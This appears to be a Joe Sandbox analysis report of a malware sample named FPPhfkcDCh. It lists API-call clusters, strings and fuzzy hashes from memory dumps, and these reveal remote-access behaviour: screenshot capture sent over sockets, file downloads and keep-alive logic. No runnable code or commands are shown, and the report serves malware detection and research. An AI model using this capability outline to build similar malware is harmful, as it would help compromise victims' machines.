                                                  • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                  • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                  • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SystemTimes$Sleep__aulldiv
                                                  • String ID:
                                                  • API String ID: 188215759-0
                                                  • Opcode ID: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                  • Instruction ID: 634937a4cd8d43e921f59083ecd148feda9109121ee8127270144c35be039893
                                                  • Opcode Fuzzy Hash: 32d4930cb2be9b30136c829dd369e4a23351f3455ccfda4be26c85d87a7cef4d
                                                  • Instruction Fuzzy Hash: D01133B35043456BC304EAB5CD85DEF779CEBC4358F040A3EF64982061EE29E94986A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                                  • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                                  • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                  • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID:
                                                  • API String ID: 3177248105-0
                                                  • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                  • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                  • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C576
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleReadSize
                                                  • String ID:
                                                  • API String ID: 3919263394-0
                                                  • Opcode ID: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                                  • Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
                                                  • Opcode Fuzzy Hash: ea631e93aeae4d86132659a3c821e70bd950fb822780c369254ddbb306c6d1ec
                                                  • Instruction Fuzzy Hash: 50F0C2B1241318BFE6101B25ADC9EBB369DDB866A9F10063EF802A22D1DA698D055139
                                                  APIs
                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
                                                    • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
                                                  • _UnwindNestedFrames.LIBCMT ref: 00439911
                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
                                                  • CallCatchBlock.LIBVCRUNTIME ref: 00439947
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                  • String ID:
                                                  • API String ID: 2633735394-0
                                                  • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction ID: 1eef882e9718bbd9a0ab38cd68ce054dbb3f9d4064fa539f417e17899f1f7293
                                                  • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                  • Instruction Fuzzy Hash: 38010532000109BBCF125F56CC01EDA3BAAEF5C754F05901AF95865221C3BAE862ABA4
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000004C), ref: 0041942B
                                                  • GetSystemMetrics.USER32(0000004D), ref: 00419431
                                                  • GetSystemMetrics.USER32(0000004E), ref: 00419437
                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041943D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction ID: fd4820a3fb0c8fcfb80096478546269f04700e3de9cdf271d69d174aa35805c7
                                                  • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                                  • Instruction Fuzzy Hash: 3FF0A4B1B043155BD700EE758C51A6B6ADAEBD4364F10043FF60887281EFB8DC468B84
                                                  APIs
                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
                                                    • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                  • String ID:
                                                  • API String ID: 1761009282-0
                                                  • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction ID: 3a6c9073cd349407f79861cc5a63413a30b4b1af88e8d748f4708d1390bfb410
                                                  • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                  • Instruction Fuzzy Hash: 8DC04C44080381552C50B6B2110B2AF83521C7E38CF9074DFBDD1579474D5D052F553F
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00442D3D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorHandling__start
                                                  • String ID: pow
                                                  • API String ID: 3213639722-2276729525
                                                  • Opcode ID: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction ID: 2abd0c7c8e13d4a8cd2c8141c546921d868ac315c0d238e81b652aa6ec7fde8b
                                                  • Opcode Fuzzy Hash: ba08a0cb9aac2d09af1d9c353536d0054585ad8ee24c5cded07915036f7ff901
                                                  • Instruction Fuzzy Hash: 92515AE1E0460296FB167714CE4137B6794AB50741F70497BF0D6823EAEA7C8C859B4F
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: __alloca_probe_16__freea
                                                  • String ID: `m
                                                  • API String ID: 1635606685-2103878915
                                                  • Opcode ID: 6ed1b5b28f312efda8a64280480d8e8c76afcccd471f1312fe4975d22586bb37
                                                  • Instruction ID: d8508cce09ee0c909582ed34c2e37a62d4695ec9c35a5d1c30796301694c113b
                                                  • Opcode Fuzzy Hash: 6ed1b5b28f312efda8a64280480d8e8c76afcccd471f1312fe4975d22586bb37
                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                  APIs
                                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000,00000000), ref: 004187FA
                                                    • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: GdiplusStartupconnectsend
                                                  • String ID: ,aF$NG
                                                  • API String ID: 1957403310-2168067942
                                                  • Opcode ID: 3b2d0cff710a846f5920f95ca5260b3916bb2f9043a7c52255e9bcc64645f95c
                                                  • Instruction ID: 646e85ae029ebb21aec6d49858a727e037fa7bb3a6359959f193cd142bf324ca
                                                  • Opcode Fuzzy Hash: 3b2d0cff710a846f5920f95ca5260b3916bb2f9043a7c52255e9bcc64645f95c
                                                  • Instruction Fuzzy Hash: 8E41D4713042015BC208FB22D892ABF7396ABC0358F50493FF54A672D2EF7C5D4A869E
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418AF9
                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/jpeg
                                                  • API String ID: 1291196975-3785015651
                                                  • Opcode ID: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                                  • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                  • Opcode Fuzzy Hash: 1a6cd23bb326207906ee55eab088e22a045b333238033622bcf03b289c973c7d
                                                  • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                  APIs
                                                  • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ACP$OCP
                                                  • API String ID: 0-711371036
                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                  APIs
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BE5
                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418C0A
                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                  • String ID: image/png
                                                  • API String ID: 1291196975-2966254431
                                                  • Opcode ID: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                                  • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                  • Opcode Fuzzy Hash: c053decb124affeca1ca8e7c910363171ca68cdd065e9a4048a61e85df625b55
                                                  • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00449CBC
                                                  • GetFileType.KERNEL32(00000000), ref: 00449CCE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileHandleType
                                                  • String ID: Pom
                                                  • API String ID: 3000768030-1117494575
                                                  • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                  • Instruction ID: 0971e15b3ed75ae4f19990cc7af9cd82d4526e04a272429d5fd5d939a02a2197
                                                  • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                  • Instruction Fuzzy Hash: EF11907250475246E7308F3E9CC8223BAD5AB52331B38072BD5B7966F1C328DC82F249
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                  Strings
                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalTime
                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                  • API String ID: 481472006-1507639952
                                                  • Opcode ID: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                  • Opcode Fuzzy Hash: 88bc6abef2036a94c41ea4afde5572064ad21bcafcbd622e37c2bb368cee5363
                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: Pom
                                                  • API String ID: 269201875-1117494575
                                                  • Opcode ID: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                                  • Instruction ID: 50f29c45267cc5de65db45c76c11a9fc4df43ae0f191c64cb21c29ff245d41fa
                                                  • Opcode Fuzzy Hash: a20b441ddeb67c9ee691f7cf4a146dca50fcbe4cc28fbe4176985be8152cb82c
                                                  • Instruction Fuzzy Hash: 9011D371A002004AEF309F39AC81B563294A714734F15172BF929EA3D6D3BCD8825F89
                                                  APIs
                                                  • Sleep.KERNEL32 ref: 0041667B
                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4123999742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.4123961205.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124033465.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124052114.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4124082369.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_FPPhfkcDCh.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DownloadFileSleep
                                                  • String ID: !D@
                                                  • API String ID: 1931167962-604454484
                                                  • Opcode ID: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                  • Opcode Fuzzy Hash: 05864501e3066f261fa3773e90e58814017deb9033068c5665e3f6f63e0eedc9
